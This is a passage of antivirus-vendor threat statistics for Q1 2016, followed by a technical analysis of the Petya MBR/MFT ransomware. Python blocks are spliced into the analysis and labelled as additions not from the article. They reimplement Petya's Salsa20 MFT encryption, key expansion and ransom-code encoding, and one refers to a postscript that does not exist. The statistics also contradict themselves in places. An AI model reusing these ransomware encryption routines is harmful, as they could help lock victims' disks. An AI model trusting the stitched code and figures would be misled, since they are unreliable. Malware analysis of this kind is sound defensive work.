The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2016, Kaspersky Lab solutions blocked 228,420,754 attacks launched from web resources located in 195 countries around the world. 76% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q1 2016

Q1 saw the Netherlands take over first place (24.6%) from the US (21.44%). Russia (7.45%) and Germany (6%), which followed them, also swapped places. Vietnam has dropped out of the Top 10, while Bulgaria is a newcomer in eighth place with 1.75%.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

Country*          % of unique users attacked**
1   Russia          36.28
2   Kazakhstan      33.19
3   China           32.87
4   Azerbaijan      30.28
5   Ukraine         29.96
6   Belarus         29.16
7   Slovenia        26.88
8   Armenia         26.27
9   Vietnam         25.14
10  Moldova         24.68
11  Kyrgyzstan      24.46
12  Spain           24.00
13  India           23.98
14  Brazil          23.68
15  Italy           22.98
16  Algeria         22.88
17  Lithuania       22.58
18  Croatia         22.04
19  Turkey          21.46
20  France          21.46

These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The leader of this ranking remained unchanged – it is still Russia with 36.3%. Since the previous quarter, Chile, Mongolia, Bulgaria and Nepal have left the Top 20. Newcomers to the ranking are Slovenia (26.9%), India (24%) and Italy (23%).

The countries with the safest online surfing environments included Germany (17.7%), Canada (16.2%), Belgium (14.5%), Switzerland (14%), the US (12.8%), the UK (12.7%), Singapore (11.9%), Norway (11.3%), Honduras (10.7%), the Netherlands (9.6%) and Cuba (4.5%).

On average, 21.42% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a fall of 1.5 p.p. compared to Q4 2015.

Local threats

Local infection statistics for users’ computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2016, Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus had been triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country*          % of unique users**
1   Somalia         66.88%
2   Yemen           66.82%
3   Armenia         65.17%
4   Kyrgyzstan      64.45%
5   Russia          64.18%
6   Tajikistan      64.06%
7   Bangladesh      63.00%
8   Vietnam         61.31%
9   Afghanistan     60.72%
10  Kazakhstan      60.62%
11  Nepal           59.60%
12  Uzbekistan      59.42%
13  Ethiopia        59.23%
14  Ukraine         58.90%
15  Byelorussia     58.51%
16  Laos            58.46%
17  Rwanda          58.10%
18  Iraq            57.16%
19  Algeria         57.50%
20  Moldova         56.93%

These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).

** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

Somalia became the new leader of this rating in Q1, with 66.9%. Bangladesh, the leader for the past few quarters, dropped to seventh place (63.6%). Newcomers to this ranking are Uzbekistan in 12th place (59.4%), Ukraine in 14th place (58.9%), Belarus in 15th place (58.5%), Iraq in 18th place (57.2%) and Moldova in 20th (57.0%).

The safest countries in terms of local infection risks were the Czech Republic (27.2%), Denmark (23.2%) and Japan (21.0%).

An average of 44.5% of computers globally faced at least one local threat during Q1 2016, which is 0.8 p.p. more than in Q4 2015.

Petya: the two-in-one trojan

Malware Alerts - Wed, 05/04/2016 - 06:39

Infecting the Master Boot Record (MBR) and encrypting files is nothing new in the world of malicious programs. Back in 1994, the virus OneHalf emerged that infected MBRs and encrypted the disk contents. However, that virus did not extort money. In 2011, MBR blocker Trojans began spreading (Trojan-Ransom.Win32.Mbro) that infected the MBR and prevented the operating system from loading further. The victim was prompted to pay a ransom to get rid of the problem. It was easy to treat a system infected by these blocker Trojans because, apart from the MBR, they usually didn’t encrypt any data on the disk.

Today, we have encountered a new threat that’s a blast from the past. The Petya Trojan (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Petr) infects the MBR preventing normal system loading, and encrypts the Master File Table (MFT), an important part of the NT file system (NTFS), thus preventing normal access to files on the hard drive.

The infection scenario

The people spreading Petya attack their potential victims by sending spam messages containing links that download a ZIP archive. The archive contains the Trojan’s executable file and a JPEG image. The file names are in German (Bewerbungsunterlagen.PDF.exe, Bewerbungsmappe-gepackt.exe), are made to look like resumes for job candidates, and target HR staff in German-speaking countries.

Contents of the archives downloaded from links in spam

The cybercriminals didn’t bother with automatic escalation of privileges – the manifest of the Trojan’s executable file contains the following standard record:

If the user launches the malicious executable file Petya, Windows will show the standard UAC request for privilege escalation. If the system has been properly configured by the system administrators (i.e. UAC is enabled, and the user is not working from an administrator account), the Trojan won’t be able to run any further.

Unfortunately, a user who has the privileges to agree to a UAC request often underestimates the potential risks associated with launching unknown software with elevated rights.

How it works

The executable file and the packer

A Petya Trojan infection begins with the launch of the malicious executable file. The samples of the Trojan that Kaspersky Lab received for analysis are, just like most other malware samples, protected with a customized packer. When the executable file launches, the malicious packer’s code begins to work – it unpacks the malicious DLL Setup.dll into a newly designated RAM area, and then passes control to it.

Cybercriminals typically use packers to avoid detection – circumvent static signatures, trick the heuristic analyzer, etc. While investigating the Petya packer, we noticed an unusual trick used by the cybercriminals.

Cybercriminals often try to create the packer in such a way that a packed malicious executable file looks as similar as possible to a regular legitimate file. Sometimes, they take a legitimate file and substitute part of the code with malicious code. That’s what they did with Petya, with one interesting peculiarity: it was a part of the standard compiler-generated runtime DLL that was replaced with malicious code, while the function WinMain remained intact. The illustration below shows the transition, beginning from the entry point (“start”). As can be seen, the function that unpacks the malicious code (which we dubbed “evil”) is called from the legitimate function __calloc_crt, which is part of the runtime code.

Diagram of transitions between the malicious packer’s functions

Why do it that way? Obviously, the creators of the malicious packer were trying to trick an inattentive researcher or automatic analyzers: the file looks legitimate – WinMain doesn’t contain malicious code – so it’s possible that it will be overlooked. Besides, if the breakpoint is set at WinMain during debugging, then the malicious code works (and sends the system into BSOD, as we will discuss later in detail) and execution is over before the breakpoint is even reached.

Kaspersky Lab has detected Petya samples that masquerade as legitimate files written in C/C++ and in Delphi.

The malicious DLL

Setup.dll is a DLL with just one export: _ZuWQdweafdsg345312@0. It is written in C and compiled in Microsoft Visual Studio. The cybercriminals used an implementation of cryptographic algorithms available in the public library mbedtls (formerly polarssl). Setup.dll is not saved to the hard drive as a separate file, but always remains in the RAM.

When Setup.dll receives control, it decrypts the data contained in the section ‘.xxxx’ and then proceeds to infect the victim computer.

The encrypted ‘.xxxx’ section containing data

Fragment of the decrypted data from the ‘.xxxx’ section

At a higher degree of abstraction, the actions of Setup.dll come down to the following:

  1. Re-write the boot record on the hard drive with its own malicious loader;
  2. Generate a key, infection ID and other auxiliary information, and save them to the hard drive;
  3. Cause a system abort and reboot, thereby passing control to the malicious loader.

Now let’s look in detail at how all of this is implemented in the Trojan. But before doing so, we need to define the terminology used.

Hard disk sector – the minimum addressable unit of a hard drive, typically 512 bytes.

Master boot record (MBR) – the code and the data written to Sector 0. After hardware is initialized, this code is used to boot the PC. Also, this sector contains the hard disks’ partition table. A disk partitioned with MBR may have up to four primary partitions, and the maximum partition size is ~2.2 TB.

GUID Partition Table (GPT) – a more modern standard of hard drive layout. It supports up to 128 partitions, each up to 9.4 ZB in size (1 ZB = 10^21 bytes).

Now let’s return to the Trojan under review. Setup.dll can infect disks partitioned according to either the older MBR standard or the more modern GPT standard. There are two alternative branches of execution sequences in the malicious program; the choice of execution branch depends on the data in the field PartitionStyle of the structure PARTITION_INFORMATION_EX.

Selection of the execution branch for disk infection, depending on whether the disk has MBR or GPT partitioning

Infecting an MBR disk

When infecting an MBR disk, Setup.dll performs the following actions:

  1. Encrypts sector 0 (the original code and the MBR data) with the simple operation XOR 0x37 (ASCII ‘7’), writes the result to sector 56;
  2. Encrypts sectors 1-33 with the same operation XOR 0x37;
  3. Generates configuration data for the malicious loader, writes them to sector 54;
  4. Creates the verification sector 55 populated with the repeating byte 0x37;
  5. Copies the disk’s NT signature and the partition table saved from the original MBR into its own first-level loader; writes first-level malicious code to sector 0 of the disk, and writes second-level code to sectors 34-50 (referred to here as the malicious loader);
  6. Calls the function NtRaiseHardError, which causes the operating system to crash (BSOD – the ‘blue screen of death’).

When an MBR disk has been infected, the beginning of the disk has the following structure:

Number of sector    Content
0                   First-level malicious loader
1 – 33              Encrypted sectors 1-33 (XOR 0x37)
34 – 50             Second-level malicious code
…
54                  Configuration sector of the malicious program
55                  Verification sector (populated with byte 0x37)
56                  Encrypted original MBR code (XOR 0x37)

Infecting a GPT disk

When infecting a GPT disk, Setup.dll performs more actions:

  1. Based on the Primary GPT Header data, it obtains the address of the GPT header copy (the backup header at the end of the disk);
  2. Encrypts the GPT header copy with XOR 0x37;
  3. Performs all the actions that are performed when encrypting an MBR disk.

When a GPT disk has been infected, the beginning of the disk has the following structure:

Number of sector              Content
0                             First-level malicious loader
1 – 33                        Encrypted sectors 1-33 (XOR 0x37)
34 – 50                       Second-level malicious code
…
54                            Configuration sector of the malicious program
55                            Verification sector (populated with byte 0x37)
56                            Encrypted original MBR code (XOR 0x37)
…
Backup LBA – Backup LBA + 33  Encrypted copy of GPT Header (XOR 0x37)

Generation of configuration data

In the configuration sector (sector 54), the Trojan keeps the data it needs to encrypt MFT and decrypt it if the victim pays the ransom. Generation of the configuration data consists of the following steps:

  1. Setup.dll generates a random string that is 16 characters long [1-9, a-x, A-X]; we will call this string password;
  2. Generate a pair of keys: ec_session_priv (a private key, a random large integer number) + ec_session_pub (public key, a point on a standard elliptic curve secp192k1);
  3. Calculate the session secret: session_secret = ECDH (ec_session_priv, ec_master_pub); the cybercriminals’ public key ec_master_pub is contained in the Trojan’s body;
  4. Calculate the aes_key = SHA512(session_secret) – only the first 32 bytes of the hash sum are used;
  5. Encrypt the ‘password’ string by XORing it with the first 16 bytes of ec_session_pub: password_xor = ec_session_pub[0, 15] xor password;
  6. Encrypt the result using AES-256 with the key aes_key: password_aes_encr = AES_enc(password_xor);
  7. Create the array ec_session_data = [ec_session_pub, password_aes_encr];
  8. Calculate base58: ec_session_data_b58 = base58_enc(ec_session_data);
  9. Use the result to calculate SHA256: digest = sha256(ec_session_data_b58);
  10. Create array: ec_data = [check1, check2, ec_session_data_b58], where check1, check2 are bytes calculated by the formulas:
    a = digest[0] & 0xF;
    b = (digest[0] & 0xF) < 10;
    check1 = (digest[0] >> 4) + 0x57 + ((digest[0] >> 4) < 10 ? 0xD9 : 0);
    check2 = a + 0x57 + (b ? 0xD9 : 0);
  11. Based on the ‘password’, create a key for MFT encryption;

Pseudocode creating a key for MFT encryption

  12. Generate IV – 8 random bytes which will be used during MFT encryption;
  13. Generate infection ID and use it to create “personalized” URLs for ransom payment webpages.
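The check-byte arithmetic from the configuration-data steps above, as an added example (Python, not the article's or the Trojan's own code): it implements the check1/check2 formula as printed, shows what it reduces to, and uses it to validate a recovered ec_data blob from sector 54. The base58 session string is a constructed placeholder, and the assumption that the sums wrap modulo 256 (the article calls the results bytes) is mine.

```python
"""Check bytes and framing of Petya's ec_data (configuration sector 54).

Added example, not code from the article. Only the check bytes and the
[check1, check2, ec_session_data_b58] framing are modelled; no ECDH or AES
key material is generated here.
"""
import hashlib

# Constructed placeholder: base58 alphabet characters only, not a real blob.
SAMPLE_EC_SESSION_DATA_B58 = b"2gXa5QP7TzWmN1K9Yb"


def check_bytes(digest: bytes) -> bytes:
    """check1/check2 exactly as the article prints them.
    Assumption: the results are stored as single bytes, so sums wrap mod 256."""
    a = digest[0] & 0xF
    b = (digest[0] & 0xF) < 10
    hi = digest[0] >> 4
    check1 = (hi + 0x57 + (0xD9 if hi < 10 else 0)) & 0xFF
    check2 = (a + 0x57 + (0xD9 if b else 0)) & 0xFF
    return bytes([check1, check2])


def check_bytes_as_hex(digest: bytes) -> bytes:
    """What the formula amounts to: 0x57 + 0xD9 = 0x130, so a nibble below 10
    ends up as nibble + 0x30 ('0'..'9'), and a nibble of 10..15 as nibble + 0x57
    ('a'..'f'). The two check bytes are the lowercase hex of digest[0]."""
    return b"%02x" % digest[0]


def all_first_bytes_match() -> bool:
    """Exhaustive confirmation that the formula equals hex for every digest[0]."""
    return all(check_bytes(bytes([v])) == check_bytes_as_hex(bytes([v]))
               for v in range(256))


def build_ec_data(ec_session_data_b58: bytes) -> bytes:
    """ec_data = [check1, check2, ec_session_data_b58] (steps 9 and 10)."""
    digest = hashlib.sha256(ec_session_data_b58).digest()
    return check_bytes(digest) + ec_session_data_b58


def parse_ec_data(ec_data: bytes):
    """Split a recovered ec_data into (check_ok, ec_session_data_b58).
    The check only covers 8 bits of the digest, so it catches gross corruption
    of a recovered sector, not a deliberate forgery."""
    if len(ec_data) < 3:
        return False, b""
    body = ec_data[2:]
    expected = check_bytes(hashlib.sha256(body).digest())
    return ec_data[:2] == expected, body
```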

Ultimately, the configuration data structure looks like this:

In C language syntax, this structure can be presented as follows:

This is what the configuration data looks like after it is written to the hard drive:

Note that if the user turns off their computer after this stage and doesn’t switch it on again, only minimum damage will be done, as it is not difficult to decrypt data encrypted with 1-byte XOR. Therefore, a good piece of advice: if you launch an unknown file and your system suddenly crashes, showing a blue screen, you should switch off your computer and get help from a qualified specialist. The specialist should be able to identify a Petya infection and restore the disk sectors encrypted with XOR.
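What that recovery looks like against the stage-one sector layout given under "Infecting an MBR disk", as an added example (Python, not the article's code): it recognises the layout (sector 55 filled with 0x37, the XOR 0x37 copy of the original MBR in sector 56), tells the pre-reboot stage from the post-reboot stage, and restores sectors 0 and 1-33. The disk image is constructed in memory; the sector numbers and the XOR key are the article's, everything else is filler.

```python
"""Triage of a disk image against the Petya stage-one layout described above.

Added example, not code from the original article. Works on a raw image
(bytes); reading a real device or image file is left to the caller.
"""

SECTOR = 512
XOR_KEY = 0x37                    # ASCII '7', per the article
VERIFY_SECTOR = 55                # filled with 0x37 before reboot
BACKUP_MBR_SECTOR = 56            # original MBR, XOR 0x37
XORED_SECTORS = range(1, 34)      # sectors 1-33, XOR 0x37
BOOT_SIGNATURE = b"\x55\xaa"      # last two bytes of a valid MBR sector


def sector(img: bytes, n: int) -> bytes:
    return img[n * SECTOR:(n + 1) * SECTOR]


def xor37(data: bytes) -> bytes:
    return bytes(b ^ XOR_KEY for b in data)


def classify(img: bytes) -> str:
    """'stage-one': not yet rebooted, XOR-only damage, fully reversible.
    'stage-two': the loader has run; sector 55 was Salsa20-encrypted and the
    MFT cannot be recovered without the key. 'no-match': layout not present."""
    if len(img) < (BACKUP_MBR_SECTOR + 1) * SECTOR:
        return "no-match"
    if xor37(sector(img, BACKUP_MBR_SECTOR))[-2:] != BOOT_SIGNATURE:
        return "no-match"
    if sector(img, VERIFY_SECTOR) == bytes([XOR_KEY]) * SECTOR:
        return "stage-one"
    return "stage-two"


def restore_stage_one(img: bytes) -> bytes:
    """Copy of img with the original MBR back in sector 0 and sectors 1-33
    un-XORed. Refuses anything that is not in the reversible stage-one state."""
    if classify(img) != "stage-one":
        raise ValueError("image is not in the reversible stage-one layout")
    out = bytearray(img)
    out[0:SECTOR] = xor37(sector(img, BACKUP_MBR_SECTOR))
    for n in XORED_SECTORS:
        out[n * SECTOR:(n + 1) * SECTOR] = xor37(sector(img, n))
    return bytes(out)


# --- constructed fixtures (filler, not real disk data) ----------------------

def build_clean_image(n_sectors: int = 64) -> bytes:
    """Sector n holds the byte (100 + n); sector 0 ends in the 55 AA signature."""
    mbr = bytes([100]) * (SECTOR - 2) + BOOT_SIGNATURE
    rest = b"".join(bytes([100 + n]) * SECTOR for n in range(1, n_sectors))
    return mbr + rest


def build_stage_one_image(clean: bytes) -> bytes:
    """Arrange the clean fixture the way the article describes the disk
    before the reboot. Sector 0 gets filler standing in for the loader."""
    out = bytearray(clean)
    out[BACKUP_MBR_SECTOR * SECTOR:(BACKUP_MBR_SECTOR + 1) * SECTOR] = \
        xor37(sector(clean, 0))
    out[VERIFY_SECTOR * SECTOR:(VERIFY_SECTOR + 1) * SECTOR] = \
        bytes([XOR_KEY]) * SECTOR
    for n in XORED_SECTORS:
        out[n * SECTOR:(n + 1) * SECTOR] = xor37(sector(clean, n))
    out[0:SECTOR] = b"\x90" * SECTOR
    return bytes(out)


def build_stage_two_image(stage_one: bytes) -> bytes:
    """After the reboot the verification sector no longer holds plain 0x37
    (the article: it is Salsa20-encrypted); any other content models that."""
    out = bytearray(stage_one)
    out[VERIFY_SECTOR * SECTOR:(VERIFY_SECTOR + 1) * SECTOR] = bytes(range(256)) * 2
    return bytes(out)
```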

If, however, the computer was re-booted, then the Trojan’s third stage kicks in – the malicious code written to sectors 0 and 34–50.

The malicious loader

After rebooting, the code in sector 0 (the first-level loader) gains control. It loads the main second-level malicious code from sectors 34–50 into the memory and passes control to it. This code, in turn, receives information about the hard drives available in the system, searches for the disk where the configuration is written, reads the configuration data from sector 54 and, depending on the value in the field ‘config.state’, begins encryption (if the value is 0) or asks the user to enter the decryption key that they have purchased (if the value is 1).

Fragment of code implementing the Trojan’s logic

Encryption of MFT

The master file table (MFT) is a data structure holding information about every file and directory on a volume formatted with NTFS, the file system used in all modern versions of Windows. The table contains the service data required to locate each file on the disk. It can be compared to the table of contents of a book, which tells you on which page to find a chapter; similarly, the MFT indicates which logical clusters hold a file’s data.

It is precisely this critical area that Petya attacks. If the value of ‘config.state’ is 0 at launch, it does the following:

  1. Displays a fake disk check message:
  2. Reads the key ‘config.salsa_key’ from the configuration sector into a local array, then zeroes that field on disk and sets ‘config.state’ to 1 (so the key survives only in memory from this point on);
  3. Encrypts the verification sector 55 with the stream cipher Salsa20; this sector is populated beforehand with the byte 0x37 (see the section ‘Infecting an MBR disk’ above);
  4. Searches for each partition’s MFT on each connected hard drive;
  5. Encrypts the MFT data with cipher Salsa20. Encryption is performed in parts of 8 sectors (i.e. the size of each part is 4 KB). A counter of the encrypted parts is kept in sector 57 of the first disk.
  6. When encryption is over, it triggers a system reboot.

After the reboot, Petya displays an animated image of a flashing red and white skull drawn in ASCII-art style.

If the user presses any key, the Trojan displays a text which tells the victim in no uncertain terms what has happened.

Ransom demand and decryption

On this screen Petya displays links to the ransom payment webpages located in the Tor network (the addresses are specified in config.mal_urls), and the “personal decryption code” which the victim has to enter at either of the above sites. In reality, this “code” is the content of the field ‘config.ec_data’, hyphenated every six characters.

So, how do the cybercriminals plan to decrypt MFT, and are they even capable of doing so?

The ‘Key:’ field on this screen accepts a text string from the user. The string must be exactly 16 characters long; the Trojan then uses it to calculate a 32-byte ‘salsa_key’ (following the algorithm discussed above in the section ‘Generation of configuration data’). It attempts to decrypt the verification sector 55 with this key and checks that the decrypted sector consists entirely of the byte 0x37. If it does, the key is considered correct and Petya uses it to decrypt the MFT. It then decrypts the starting sectors encrypted with XOR 0x37, restores the original MBR and prompts the user to reboot the computer.

Thus, the correct string to be entered in the ‘Key:’ field is that very same ‘password‘ string that is generated in the first step when the configuration data is created.
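The key check described here, together with the sector-55 and MFT encryption steps in ‘Encryption of MFT’ above, as an added Python example that is neither the Trojan’s code nor code from the original article: a standard Salsa20/20 keystream, the all-0x37 verification-sector test run on a candidate ‘Key:’ string, and part-by-part MFT encryption with the progress counter. Two things are assumptions: the expansion of the 16-character password into the 32-byte Salsa20 key (taken from public analyses of the sample, since the page shows its own derivation only as a figure), and the way the Salsa20 block counter advances between 4 KB parts, which the page does not specify. The IV, password and MFT image are constructed test data.

```python
import struct

MASK32 = 0xFFFFFFFF
SIGMA = struct.unpack("<4I", b"expand 32-byte k")   # Salsa20 constants for 32-byte keys
_COLUMNS = ((0, 4, 8, 12), (5, 9, 13, 1), (10, 14, 2, 6), (15, 3, 7, 11))
_ROWS = ((0, 1, 2, 3), (5, 6, 7, 4), (10, 11, 8, 9), (15, 12, 13, 14))
SECTOR = 512
PART_SECTORS = 8          # the Trojan encrypts the MFT in parts of 8 sectors (4 KB)
VERIFY_FILL = 0x37        # verification sector 55 is pre-filled with this byte


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _quarterround(y0, y1, y2, y3):
    y1 ^= _rotl((y0 + y3) & MASK32, 7)
    y2 ^= _rotl((y1 + y0) & MASK32, 9)
    y3 ^= _rotl((y2 + y1) & MASK32, 13)
    y0 ^= _rotl((y3 + y2) & MASK32, 18)
    return y0, y1, y2, y3


def salsa20_block(key, nonce, counter):
    """One 64-byte Salsa20/20 keystream block (standard Salsa20, 32-byte key, 8-byte nonce)."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    init = [SIGMA[0], k[0], k[1], k[2], k[3], SIGMA[1], n[0], n[1],
            counter & MASK32, (counter >> 32) & MASK32, SIGMA[2],
            k[4], k[5], k[6], k[7], SIGMA[3]]
    x = list(init)
    for _ in range(10):                       # 10 double rounds = 20 rounds
        for a, b, c, d in _COLUMNS + _ROWS:   # column round, then row round
            x[a], x[b], x[c], x[d] = _quarterround(x[a], x[b], x[c], x[d])
    return struct.pack("<16I", *((x[i] + init[i]) & MASK32 for i in range(16)))


def salsa20_xor(key, nonce, data, counter=0):
    """XOR data with the keystream; the same call encrypts and decrypts."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = salsa20_block(key, nonce, counter + off // 64)
        out += bytes(p ^ s for p, s in zip(data[off:off + 64], ks))
    return bytes(out)


def salsa_key_from_password(password):
    """ASSUMPTION: 16-character password -> 32-byte key. The page shows the real
    derivation only as a figure; this expansion is the one reported in public
    analyses of the sample and is used here purely as a stand-in."""
    pw = password.encode("ascii")
    if len(pw) != 16:
        raise ValueError("Petya requires a 16-character key string")
    key = bytearray(32)
    for i, c in enumerate(pw):
        key[2 * i] = (c + 0x7A) & 0xFF
        key[2 * i + 1] = (c * 2) & 0xFF
    return bytes(key)


def encrypt_verification_sector(salsa_key, iv):
    """Step 3 of the encryption stage: sector 55, pre-filled with 0x37, under Salsa20."""
    return salsa20_xor(salsa_key, iv, bytes([VERIFY_FILL]) * SECTOR)


def key_unlocks_disk(candidate, iv, encrypted_sector55):
    """The check Petya runs on the 'Key:' input: length first, then decrypt
    sector 55 and require every byte to be 0x37. A wrong or short key never
    gets as far as the MFT."""
    try:
        key = salsa_key_from_password(candidate)
    except (ValueError, UnicodeEncodeError):
        return False
    return salsa20_xor(key, iv, encrypted_sector55) == bytes([VERIFY_FILL]) * SECTOR


def encrypt_mft(salsa_key, iv, mft):
    """Encrypt an MFT image in 4 KB parts; returns the ciphertext and the number
    of parts done (the counter Petya keeps in sector 57). ASSUMPTION: part i
    starts at Salsa20 block counter i*64, i.e. one continuous keystream."""
    part = PART_SECTORS * SECTOR
    out, parts_done = bytearray(), 0
    for off in range(0, len(mft), part):
        out += salsa20_xor(salsa_key, iv, mft[off:off + part],
                           counter=parts_done * (part // 64))
        parts_done += 1
    return bytes(out), parts_done
```

Because the verification sector is a known-plaintext block (512 bytes of 0x37) encrypted under the same key and IV as the MFT, anyone holding sectors 54 and 55 can test candidate keys offline without the attackers’ help, which is the property the P.S. at the end of this article builds on.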

Screen message displayed after successful decryption

The question remains: how do the cybercriminals know this string so they can communicate it to a victim who has paid the ransom? No automatic communication with C&C servers is established during the entire infection life cycle. The answer lies in the description of the algorithm for generating configuration data.

The victim is prompted to manually enter their “personal decryption code” ec_data on the ransom payment webpage. The cybercriminal can then perform the following actions:

  1. Decode base58: base58_dec(ec_session_data_b58) = ec_session_data = [ec_session_pub, password_aes_encr]
  2. Calculate session_secret = ECDH(ec_session_pub, ec_master_priv), in accordance with the Elliptic curve Diffie–Hellman properties, where ec_master_priv is a private key known to the Trojan’s creators only;
  3. Calculate aes_key = SHA512(session_secret), keeping only the first 32 bytes, exactly as in step 4 of the generation algorithm;
  4. Decrypt AES-256: password_xor = AES_dec(password_aes_encr);
  5. XOR password_xor with the first 16 bytes of ec_session_pub (which the code carries in the clear) to recover the original ‘password’, which can then be handed to the victim.
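The encoding half of this scheme (steps 5 and 7 to 10 of ‘Generation of configuration data’ above) and the decoding half the attackers run (steps 1 and 5 just listed), as an added Python example that is not code from the original article or from the Trojan. ECDH and AES are deliberately left out: password_aes_encr is taken as an already-computed input and is a constructed byte string here. The base58 alphabet (Bitcoin’s) and the length of ec_session_pub (33 bytes) are assumptions, since the page gives neither.

```python
import hashlib

# ASSUMPTION: Bitcoin base58 alphabet; the article does not name the variant used.
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
PUB_LEN = 33   # ASSUMPTION: length of ec_session_pub; the page gives no curve or encoding


def base58_encode(data):
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, r = divmod(n, 58)
        digits.append(B58_ALPHABET[r])
    pad = len(data) - len(data.lstrip(b"\x00"))      # each leading zero byte -> '1'
    return (b"1" * pad + bytes(reversed(digits))).decode("ascii")


def base58_decode(text):
    n = 0
    for ch in text.encode("ascii"):
        n = n * 58 + B58_ALPHABET.index(ch)           # ValueError on a bad character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def check_chars(b58):
    """Steps 9-10. nibble + 0x57 yields 'a'..'f' for 10..15; for 0..9 the extra
    0xD9 wraps modulo 256 to nibble + 0x30, i.e. '0'..'9'. So the two check
    bytes are just the first byte of SHA256(b58) as lowercase hex."""
    digest = hashlib.sha256(b58.encode("ascii")).digest()
    hi, lo = digest[0] >> 4, digest[0] & 0xF
    check1 = (hi + 0x57 + (0xD9 if hi < 10 else 0)) & 0xFF
    check2 = (lo + 0x57 + (0xD9 if lo < 10 else 0)) & 0xFF
    return bytes([check1, check2])


def xor_password(password, ec_session_pub):
    """Step 5 on the victim side and step 5 on the attacker side: the same XOR
    with the first 16 bytes of the session public key."""
    if len(password) != 16:
        raise ValueError("password must be 16 bytes")
    return bytes(p ^ k for p, k in zip(password, ec_session_pub[:16]))


def encode_ec_data(ec_session_pub, password_aes_encr):
    """Steps 7-10: ec_data = [check1, check2, base58(ec_session_pub || password_aes_encr)]."""
    b58 = base58_encode(ec_session_pub + password_aes_encr)
    return check_chars(b58).decode("ascii") + b58


def personal_code(ec_data):
    """The 'personal decryption code' on the skull screen: ec_data hyphenated every 6 characters."""
    return "-".join(ec_data[i:i + 6] for i in range(0, len(ec_data), 6))


def parse_personal_code(code, pub_len=PUB_LEN):
    """Attacker-side step 1, verifying the check bytes first so a mistyped or
    altered code is rejected before any key material is used."""
    ec_data = code.replace("-", "")
    b58 = ec_data[2:]
    if ec_data[:2].encode("ascii") != check_chars(b58):
        raise ValueError("check bytes do not match; code was mistyped or altered")
    raw = base58_decode(b58)
    return raw[:pub_len], raw[pub_len:]
```

Note what the check bytes do and do not protect: they catch a typo on the payment page, but they carry no secret, so they add nothing to the confidentiality of the password, which rests entirely on the AES layer keyed through ECDH with ec_master_priv.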

The ransom payment webpage

When we visit the Tor site at the URL provided by the Trojan, we see a page that requires a CAPTCHA to be entered, after which the main ransom payment page is loaded. The design of the page immediately catches the eye, with its hammer and sickle and the word ‘ransomware’ in pseudo-Cyrillic. It looks like a USSR parody along the lines of the game Red Alert.

This page displays a countdown clock showing when the ransom price will be doubled, as well as regularly updated links to news and publications related to Petya.

When the ‘Start the decryption process’ button is pressed, you end up on a page that asks you to enter the value of ‘ec_data’, which is now called “your identifier” rather than “your personal decryption code”. It looks like the cybercriminals still haven’t decided what to call this part.

When the user enters this string, the site displays the amount of ransom in BTC, information on how to purchase bitcoins, and the address where the money should be sent.

As well as that, there are two other pages on the website: FAQ and Support.

The FAQ page

The FAQ page is interesting in that it contains false information: in reality, RSA is not used by the Trojan in any way, at any stage of infection.

The Support page

On the Support page, the user is given the option of sending a message to the cybercriminals. One phrase in particular stands out: “Please write your message in english, our russian speaking staff is not always available”. This implies that there is at least one person in the group who speaks Russian.

Geographic distribution

As we noted above, the spam messages target German-speaking victims. KSN statistics clearly show that Germany is the main target for the cybercriminals.

TOP 5 countries attacked by Petya Trojan by the number of attacked users:

     Country               Number of attacked users
  1  Germany               579
  2  China                  19
  3  India                   8
  4  Japan                   5
  5  Russian Federation      5

Conclusion

After analyzing the Petya Trojan, we discovered that it is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.

Although Petya is noticeably different from the majority of ransomware that has emerged in the recent years, it can hardly be described as a fundamentally new development. The ideas behind the Trojan have been seen before in earlier malware; the creators of Petya have simply combined them all in a single creation. That said, it should be acknowledged that it requires a certain degree of technical skill to implement a low-level code to encrypt and decrypt data prior to OS booting.

Another interesting peculiarity about Petya is the pseudo-Soviet graphic design on the ransom payment website; the name of the Trojan also fits into the image of a “Russian Trojan” designed by cybercriminals. There is no certainty as to whether the Trojan’s creators originally come from Russia or other former Soviet states; however, the text on the payment page suggests there is at least one Russian speaker in the gang.

